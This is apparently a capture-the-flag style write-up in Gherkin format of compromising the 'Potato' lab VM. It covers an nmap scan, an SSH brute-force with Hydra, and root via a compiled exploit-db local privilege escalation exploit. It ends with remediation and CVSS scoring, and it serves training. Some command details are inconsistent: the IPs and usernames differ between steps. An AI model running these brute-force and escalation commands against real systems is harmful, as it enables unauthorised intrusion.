## Version 1.4.1
## language: en

Feature:
  TOE:
    Potato
  Category:
    Brute Force
  Location:
    http://192.168.1.69/
  CWE:
    CWE-307: Improper Restriction of Excessive Authentication Attempts
  Rule:
    REQ.237: Ascertain human interaction
  Goal:
    Get shell as root
  Recommendation:
    Restrict the number of attempts to connect to the system

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Parrot OS         |  4.10      |
    | Nmap              |  7.80      |
    | Hydra             |  9.0       |
    | VMWare            |  16.0      |
    | SSH               |  1.10      |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on Vmware
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-13 11:10 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.0064s latency).
    Nmap scan report for 192.168.1.51
    Host is up (0.11s latency).
    Nmap scan report for 192.168.1.53
    Host is up (0.013s latency).
    Nmap scan report for 192.168.1.55
    Host is up (0.0093s latency).
    Nmap scan report for 192.168.1.60
    Host is up (0.023s latency).
    Nmap scan report for 192.168.1.69
    Host is up (0.017s latency).
    Nmap scan report for 192.168.1.73
    Host is up (0.014s latency).
    Nmap scan report for 192.168.1.254
    Host is up (0.072s latency).
    Nmap done: 256 IP addresses (8 hosts up) scanned in 7.39 seconds
    """
    Then I determined that the IP of the machine is 192.168.1.69
    And I scanned the IP and found it has 2 open ports
    """
    $ nmap -sS -sV -p- 192.178.1.69
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-13 11:10 -05
    Nmap scan report for 192.168.1.69
    Host is up (0.0011s latency).
    Not shown: 65533 closed ports
    PORT     STATE SERVICE VERSION
    80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
    7120/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13
    MAC Address: 00:0C:29:04:74:B7 (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 15.59 seconds
    """

  Scenario: Normal use case
    Given there is not much to see, nor can I interact with the site
    Then a normal use case is to see a potato [evidences](normal.png)

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I'm in the website the first thing I did was to check "/robots.txt"
    Then I don't see anything interesting
    When I tried to find directories on the server with "dirb"
    """
    $ dirb http://192.168.1.69/
    """
    Then I didn't get anything useful either [evidences](nodirb.png)
    And I decided to change the attack vector, focus on port 7120 (SSH)
    Then I plan to carry out a brute force attack

  Scenario: Exploitation
    Given my idea was to brute force against the SSH service
    Then I used Hydra with the wordlist "kaonashi14M.txt"
    """
    $ hydra -l chili -P kaonashi14M.txt 192.168.1.74 ssh -s 7120
    """
    And I successfully got the SSH service password [evidences](passbf.png)
    Then I was able to connect to the service [evidences](connectssh.png)
    """
    $ ssh -p 7120 potato@192.168.1.69
    The authenticity of host '[192.168.1.69]:7120 ([192.168.1.69]:7120)'
    ECDSA key fingerprint is SHA256:QjwKCfm9o1h1b0GogvHGanceGwPkklwZxOwt9QOmXGI
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '[192.168.1.69]:7120' (ECDSA) to the list
    potato@192.168.1.69's password:
    Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

    * Documentation:  https://help.ubuntu.com/
    New release '16.04.7 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.

    Last login: Tue Sep  8 02:04:57 2020 from 192.168.17.172
    potato@ubuntu:~$
    """
    And now that I have a shell the idea is to get root privileges
    Then for this I need a way to do an Local Privilege Escalation (LPE)
    And looking at the SSH welcome message:
    """
    Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
    """
    Then I realize that it is an outdated Ubuntu
    And searching for exploits I found the following
    """
    https://www.exploit-db.com/exploits/37292
    """
    Then this exploit is a LPE that affects this version of Ubuntu
    And I decided to download
    Then what I did was pass it to the machine through SSH with the SCP command
    """
    $ scp -P 7120 37292.c potato@192.168.1.69:/tmp/.
    potato@192.168.1.69's password:
    37292.c                                       100% 5119     1.8MB/s   00:00
    """
    Then I just compiled it with GCC [evidences](gcc.png)
    """
    $ gcc 37292.c -o exploit
    $
    """
    And I executed it
    Then this way I could get root privileges [evidences](root.png)

  Scenario: Remediation
    Restrict the number of authentication attempts for the SSH service
    And avoid brute force attacks
    Then this can be achieved using CAPTCHA or incremental delays

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      9.6/10 (High) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.5/10 (High) - E:P/RL:W/RC:R
    Environmental:Unique and relevant attributes to a specific user environment
      8.5/10 (High) - CR:L/IR:M/AR:M/MAV:A/MAC:L/MPR:N/MUI:N

  Scenario: Correlations
    No correlations have been found to this date {2020-10-13}
